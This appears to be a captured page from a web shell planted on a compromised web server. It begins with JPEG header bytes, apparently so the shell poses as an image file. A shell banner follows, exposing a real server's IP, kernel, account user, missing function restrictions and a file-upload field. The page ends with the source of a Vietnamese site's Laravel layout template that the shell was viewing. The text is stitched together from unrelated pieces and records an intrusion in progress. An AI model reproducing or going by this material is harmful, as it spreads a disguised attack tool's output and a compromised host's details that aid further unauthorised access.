ÿØÿà JFIF H H ÿÛ C ÿÛ Cÿ " ÿÄ ÿÄ ÿÚ ±5¬€ ÿÄ àÿÚ ÿÄ ÀÿÚ ? ÿÄ ÀÿÚ ? ÿÄ àÿÚ ? ÿÄ àÿÚ ?! ÿÚ ÿÄ ÀÿÚ ? ÿÄ ÀÿÚ ? ÿÄ àÿÚ ? ÿÙ
| Server IP : 160.25.81.117 / Your IP : 216.73.216.137 Web Server : Apache/2 System : Linux sv05.hilab.cloud 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : bellizen ( 1045) PHP Version : 7.2.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/bellizen/public_html/storage/framework/views/ |
Upload File : |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<?php
$setting = Cache::get('setting');
if(!empty($_SESSION['lang'])){
if(!empty($_SESSION))
$a = $_SESSION['lang'];
else
$a = 'en';
} else{
$a = 'en';
}
?>
<meta http-equiv="content-language" content="vi" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=1" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7; IE=EDGE" />
<meta name="robots" content="index, follow, all" />
<meta name='revisit-after' content='1 days' />
<title><?php if(!empty($title)) echo $title; else echo $setting->title; ?></title>
<meta name="author" content="<?php echo $setting->website; ?>" />
<meta name="copyright" content="nguyennhan091@gmail.com" />
<meta name="keywords" content="<?php if(!empty($keyword)) echo $keyword; else echo $setting->keyword; ?>" />
<meta name="description" content="<?php if(!empty($description)) echo $description; else echo $setting->description; ?>" />
<meta http-equiv="content-language" content="vi" />
<meta property="og:title" content="<?php if(!empty($title)) echo $title; else echo $setting->title; ?>" />
<meta property="og:locale" content="vi_VN"/>
<meta property="og:url" content="<?php echo $setting->website; ?>" />
<meta property="og:site_name" content="<?php if(!empty($title)) echo $title; else echo $setting->title; ?>" />
<meta property="og:type" content="website" />
<meta property="og:image" content="<?php if(!empty($img_share)) echo $img_share; else echo asset('upload/hinhanh/'.$setting->photo) ?>" />
<meta property="og:description" content="<?php if(!empty($description)) echo $description; else echo $setting->description; ?>" />
<meta name="googlebot" content="all, index, follow" />
<meta name="geo.region" content="VN" />
<meta name="geo.position" content="10.764338, 106.69208" />
<meta name="geo.placename" content="HÃ Ná»™i" />
<meta name="Area" content="HoChiMinh, Saigon, Hanoi, Danang, Vietnam" />
<link rel="shortcut icon" href="<?php echo asset('upload/hinhanh/'.$setting->favico); ?>" type="image/png" />
<!---------------------------->
<link href="<?php echo e(asset('public/plugin/fonts/transfonter/stylesheet.css')); ?>" rel="stylesheet" />
<link href="https://fonts.googleapis.com/css?family=Nunito+Sans:300,300i,400,400i,600,600i,700,700i" rel="stylesheet">
<link href="<?php echo e(asset('public/plugin/fonts/font-awesome/css/font-awesome.min.css')); ?>" rel="stylesheet" />
<link href="<?php echo e(asset('public/plugin/animate/css/animate.css')); ?>" rel="stylesheet" />
<link href="<?php echo e(asset('public/plugin/bootstrap/css/bootstrap.min.css')); ?>" rel="stylesheet" />
<link rel="stylesheet" href="<?php echo e(asset('public/suss/semantic.min.css')); ?>"/>
<link rel="stylesheet" href="<?php echo e(asset('public/suss/flexslider.min.css')); ?>" />
<link href="<?php echo e(asset('public/plugin/mmenu/jquery.mmenu.all.css')); ?>" rel="stylesheet" />
<link href="<?php echo e(asset('public/plugin/animsition/css/animsition.min.css')); ?>" rel="stylesheet" />
<link href="<?php echo e(asset('public/plugin/slick/slick.css')); ?>" rel="stylesheet" />
<link href="<?php echo e(asset('public/css/style.css')); ?>" rel="stylesheet" />
<link href="<?php echo e(asset('public/css/customize.css')); ?>" rel="stylesheet" />
<!--<link href="css/customize.css" rel="stylesheet" />-->
<script src="<?php echo e(asset('public/plugin/modernizr.js')); ?>"></script>
<script src="<?php echo e(asset('public/plugin/jquery/jquery-3.2.1.min.js')); ?>"></script>
<script src="<?php echo e(asset('public/plugin/jquery/jquery-migrate-3.0.0.min.js')); ?>"></script>
<!-------------->
<script src="<?php echo e(asset('public/js/nhan/jquery.min.js')); ?>"></script>
<script type="text/javascript">
function homeUrl(){
return '<?php echo url('/'); ?>'
}
</script>
<script src="<?php echo e(asset('public/js/nhan/jquery-migrate-1.1.0.js')); ?>"></script>
<script type="text/javascript" src="<?php echo e(asset('public/js/AStarRating/js/jquery.raty.js')); ?>"></script>
<script src="<?php echo e(asset('public/plugin/numeral.min.js')); ?>"></script>
</head>
<body>
<div class="main-wrapper">
<!---- thanhkho------->
<link href="<?php echo e(asset('public/suss/toastr.min.css')); ?>" rel="stylesheet" />
<script src="<?php echo e(asset('public/suss/toastr.min.js')); ?>"></script>
<script type="text/javascript">
$(document).ready(function(){
toastr.options = {
"closeButton": true,
"debug": false,
"newestOnTop": false,
"progressBar": false,
"positionClass": "toast-top-right",
"preventDuplicates": false,
"onclick": null,
"showDuration": "300",
"hideDuration": "1000",
"timeOut": "5000",
"extendedTimeOut": "1000",
"showEasing": "swing",
"hideEasing": "linear",
"showMethod": "fadeIn",
"hideMethod": "fadeOut"
}
});
</script>
<!------------ scrip o day ----------->
<?php if(Session::has('toastr_msg')): ?>
<script type='text/javascript'>
toastr["<?php echo Session::get('toastr_lvl'); ?>"]("<?php echo Session::get('toastr_msg'); ?>")
</script>
<?php endif; ?>
<?php echo $__env->make('templates.layout.header_fix', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>
<!--./content-->
<?php echo $__env->yieldContent('content'); ?>
<?php echo $__env->make('templates.layout.footer', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>
</div>
<script src="<?php echo e(asset('public/plugin/popper/popper.min.js')); ?>"></script>
<script src="<?php echo e(asset('public/plugin/bootstrap/js/bootstrap.min.js')); ?>"></script>
<script src="<?php echo e(asset('public/suss/semantic.min.js')); ?>"></script>
<script src="<?php echo e(asset('public/suss/jquery.flexslider.min.js')); ?>"></script>
<script src="<?php echo e(asset('public/plugin/mmenu/jquery.mmenu.all.js')); ?>"></script>
<script src="<?php echo e(asset('public/plugin/animsition/js/animsition.min.js')); ?>"></script>
<script src="<?php echo e(asset('public/plugin/waypoint/jquery.waypoints.min.js')); ?>"></script>
<script src="<?php echo e(asset('public/plugin/stellar/jquery.stellar.min.js')); ?>"></script>
<script src="<?php echo e(asset('public/plugin/slick/slick.min.js')); ?>"></script>
<script src="<?php echo e(asset('public/plugin/scrollup/jquery.scrollUp.min.js')); ?>"></script>
<script src="<?php echo e(asset('public/plugin/stickOnScroll/jquery.stickOnScroll.min.js')); ?>"></script>
<script src="<?php echo e(asset('public/plugin/jquery.zoom.min.js')); ?>"></script>
<script src="<?php echo e(asset('public/plugin/main.js')); ?>"></script>
<?php echo $__env->yieldContent('script'); ?>
</body>
</html>